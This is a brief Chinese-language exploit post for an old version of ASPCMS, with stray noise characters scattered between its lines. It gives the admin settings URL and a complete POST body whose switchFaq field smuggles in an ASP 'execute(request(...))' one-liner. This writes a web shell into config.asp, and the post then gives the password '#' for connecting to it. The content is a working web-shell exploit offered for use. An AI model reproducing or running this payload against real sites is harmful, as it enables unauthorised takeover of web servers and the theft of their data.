老的ASPCMS版本的秒杀拿SHELL漏洞
; y8 d/ _* H: j9 q1 q* `: q+ M
6 V2 z7 H/ x* C# B: Z 找到后台。。。然后
$ G% S% S' \6 F$ v" B
4 K3 G/ q1 L- T. V# ^" n1 H/admin/_system/AspCms_SiteSetting.asp?action=saves
, D, N5 S- }2 Q. S- O* a/ w ! u9 w$ o; u$ U0 }) N u( [8 {7 K/ I
直接POST$ k) W0 q$ E/ Q+ K3 I
/ f% x; C8 {& J* ~
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=14 w+ C W9 O( p* C
' ]$ G' J o! B; d1 H
再连接配置文件config.asp 密码为#
2 s: r3 Q2 F3 i" [3 l/ d+ [- u |